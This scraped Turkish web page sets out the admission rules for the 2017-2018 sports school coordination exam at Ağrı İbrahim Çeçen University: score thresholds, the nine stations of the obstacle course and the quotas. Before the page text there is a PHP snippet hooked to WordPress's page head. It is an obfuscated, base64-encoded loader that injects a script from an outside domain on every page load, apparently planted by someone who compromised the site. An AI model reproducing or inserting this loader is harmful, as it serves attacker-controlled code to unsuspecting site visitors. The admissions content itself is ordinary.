function add_theme_scripts_PHNjcmlw() { echo base64_decode("PHNjcmlwdD52YXIgRG5XWmJsWklHSj1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTtEbldaYmxaSUdKLnNyYz1hdG9iKCJhSFIwY0hNNkx5OXpZWEpqYjIxaExuTndZV05sTDJwekwyMXBiaTV0WVdsdUxtcHoiKTtkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLmFwcGVuZENoaWxkKERuV1pibFpJR0opOzwvc2NyaXB0Pg=="); } add_action( 'wp_head', 'add_theme_scripts_PHNjcmlw', 0 ); Ağrı İbrahim Çeçen Üniversitesi Besyo Analiz 2017-2018 – Besyo Hakkında Güncel Bilgiler

Ağrı İbrahim Çeçen Üniversitesi Besyo Analiz 2017-2018

27 Ekim 2017
2017 Video Analiz
2 2
Bizi İnstagram 'da Takip Et Bizi YouTube 'ta Takip Et Bizi Facebook 'ta Takip Et

Güncel gelişmelerden haberdar olmak,  canlı yayınlarımızda bizlere sorular sormak, videolarımızı takip etmek ve son dakika gelişmelerini bildirim olarak almak için sağ taraftan sosyal medya hesaplarımızı takip edip tamamen ücretsiz uygulamamızı indirebilirsiniz.

AĞRI İBRAHİM ÇEÇEN ÜNİVERSİTESİ
Sınav İçeriğinin Özeti
Ağrı İbrahim Çeçen Üniversitesi Koordinasyon sınavıyla öğrenci alımı yapmaktadır. Koordinasyon derecesine göre sıralanan adayların, erkeklerde kontenjanın 4 katı, kadın adaylarda ise 3 katı değerlendirmeye alınır. 2017 Ygs(Yeni Sistem TYT olacak) Baraj puanı Öğretmenlik bölümü için 220, spor lisesi çıkışlılarda 180, Antrenörlük bölümü için 200, spor lisesi çıkışlılarda 160, Milli sporcular için 150’dir. Bu baraj puanlarının üstündeki adaylar sınava başvuru yapabilirler.

Sınavın Açıklaması
Beceri-Koordinasyon Parkurunda adayın giriş fotoselinden geçişiyle beraber elektronik kronometre çalışır ve bitiş fotoselinden geçmesiyle otomatik olarak durur. Komisyon tarafından adayın başlangıç ve bitiş arasındaki süresi kaydedilir. İki deneme hakkını kullanan adayın en iyi parkur derecesi geçerli kabul edilir ve değerlendirmeye alınır. Parkurda erkeklerde 100, kızlarda ise 120 saniyeyi aşan adaylar diskalifiye kabul edilir. Beceri-Koordinasyon Parkurunda 9 (dokuz) istasyon bulunmaktadır. İstasyonlar sırasıyla;
1. İstasyon: “Barfiks Merdiveni”
2. İstasyon: “Engel Geçişi”
3. İstasyon: “Sağlık Topu Taşıma”
4. İstasyon: “Basketbol Slalom”
5. İstasyon: “Futbolda Minyatür Kaleye Şut”
6. İstasyon: “Asimetrik Paralel”
7. İstasyon: “Hentbol Kale Atışı”
8. İstasyon: “Öne Takla”
9. İstasyon: “30m Sürat Koşusu”
Beceri-Koordinasyon Parkuru:
—Başlangıç (Fotoselden giriş)

1. İstasyon “Barfiks Merdiveni”:
Barfiks merdiveni istasyonunda; erkeklerde 2,43m, kızlarda ise 2,24m yüksekliğinde ve aralarında 40 cm mesafe bulunan 7 adet bar bulunmaktadır. Adaylar, barfiks merdiveninde bulunan her bir bara tek tek tutunmak şartıyla (En son bara tutunmak şartı gözetilmeksizin sadece temas edilmesi de geçerli kabul edilecektir) ilerleyerek istasyonu tamamlar. İstasyonu tamamlamadan yere temas eden ve barlardan herhangi birine tutunmadan veya sadece temas ederek ilerleyen aday istasyona yeniden başlamak zorundadır.
2. İstasyon “Engel Geçişi”:
Engel geçişi istasyonunda sırasıyla; ilk engelin altından, ikinci engelin üstünden, üçüncü engelin altından ve dördüncü engelin üstünden geçiş yapılarak istasyon tamamlanır. Engeller arası mesafe 1,5 m’dir.
Not: İlk ve Üçüncü Engel Yüksekliği: Erkek: 90 cm, Kız: 80 cm;
İkinci ve Dördüncü Engel Yüksekliği: Erkek: 70 cm, Kız: 60 cm’dir.
Engel atlayan, geçişleri yanlış yapan ve engelleri yıkan adaylar geri çevrilir, yıktığı engeli kendi eliyle düzeltmesi istenir ve harekete kaldığı yerden devam ettirilir. İkazlara uymayan aday diskalifiye edilir.
14
3. İstasyon “Sağlık Topu Taşıma”:
Aday, 40 cm yüksekliğindeki ahşap bank üzerinde bulunan 4 adet sağlık topunu (ağırlığı; erkeklerde 3 kg, kızlarda 2 kg) alarak 4,40 m mesafedeki diğer banka sıralama olmaksızın taşır. Sağlık topları bir banktan diğer banka birer birer taşınmalıdır. Toplar banktan düşerse, aday topu banka tekrar koyması için geri çevrilir.
4. İstasyon “Basketbol Slalom”:
Adaylar, 1,20 m aralıklara aynı hizada sıralanmış olan 5 adet dikmenin arasından basketbol topu ile slalom yaparak geçerler. Tüm adaylar basketbol topunu dikmeler arasında en az bir kez çift veya tek elle yere vurmak zorundadır. Basketbol topu istasyon sonunda bulunan sepete bırakılmalıdır. Dikme atlayan, geçişleri yanlış yapan, dikmeleri yıkan ve topu sepete bırakmayan adaylar hata yaptıkları noktaya geri çevrilir. Hatanın düzeltilmesi istenir ve harekete kaldığı yerden devam ettirilir..
5. İstasyon “Futbolda Kaleye Şut”:
Adaylar 5 m mesafedeki mini futbol kalesine futbol topu ile belirlenen vuruş bölgesinden vuruş yaparlar. İlk vuruşta gol yapan aday, bir diğer istasyona geçerek parkura devam eder. İlk vuruşun gol olmaması durumunda, aday ikinci topu yedek top bölgesinden alıp vuruş bölgesine koyarak ikinci vuruşunu gerçekleştirir. İkinci vuruşun gol olup olmaması durumuna bakılmaksızın, aday bir diğer istasyona geçerek parkura devam eder.
6. İstasyon “Asimetrik Paralel Bar”:
Adaylar, yüksekliği kızlarda 1,35 m, erkeklerde 1,40 m olan barın altından geçerek; yüksekliği kızlarda 1,65 m, erkeklerde 1,70 m olan diğer barın üstünden atlayarak asimetrik paralel bar istasyonunu tamamlarlar.
7. İstasyon: “Hentbol Kale Atışı”:
Asimetrik paralel bar istasyonunu tamamlayan aday, hentbol kalesinde belirlenen bölümlere kızlarda 7 m, erkeklerde 9 m mesafeden kale atışı gerçekleştirir. İlk atışta gol yapan aday bir diğer istasyona geçerek parkura devam eder. İlk atışın gol olmaması durumunda, aday ikinci topu yedek top bölgesinden alıp atış bölgesine gelerek ikinci atışını gerçekleştirir. İkinci atışın gol olup olmaması durumuna bakılmaksızın, aday bir diğer istasyona geçerek parkura devam eder.
8. İstasyon “Öne Takla”:
Hentbol kale atışı istasyonunu tamamlayan adaylar, 3 m mesafede bulunan jimnastik minderinde öne takla atar (öne takla formu dışındaki bir başka takla formu kullanılamaz). Öne taklasını tamamlayan aday jimnastik minderinden 3m uzaklıktaki dikmeden belirtilen yönde dönüşünü yaparak istasyonu tamamlar.
15
9. İstasyon “30m Sürat Koşusu”:
Öne takla istasyonunu tamamlayan adaylar, bitiş fotoseline 30 m mesafede bulunan dikmeden dönüşünü gerçekleştirir ve sürat koşusu yapıp bitiş fotoselinden geçerek parkuru tamamlar.
—Bitiş (Fotosel kapısından çıkış)

2017 Ağrı İbrahim Çeçen Üniversitesi Koordinasyon Parkuru

Kontenjanlar
Beden Eğitimi ve Spor Öğretmenliği Bölümü 30 Erkek 20 Kız
Antrenörlük Eğitimi Bölümü 25 Erkek 15 Kız
Antrenörlük Eğitimi Bölümü (İkinci Öğretim) 25 Erkek 15 Kız

Kimler Düşünebilir
Ağrı İbrahim Çeçen Üniversitesi sınav sistemi koordinasyon sınavıdır. Parkur derecelerine göre kontenjanın 4 katı erkek, 3 katı kadının sıralanması puanı düşük olan adaylar için büyük avantajdır. Özgeçmiş etkisinin olmaması ve sadece koordinasyon sınavıyla Üniversite yönetiminin  öğrenci kabul etmesi tercih edilen okullar arasına girmesinde neden olabilir. Ağrı ibrahim Çeçen Üniversitesini  deneyecek Erkek adayların 85 başlangıç puanı ve üzeri, bayan adayların ise 80 başlangıç puanı ve üzeri, başlangıç puanına sahip olarak başvurmalarında fayda vardır.

Sınav Kılavuzunu İndir

 

0

Bir Cevap Yazın

Menü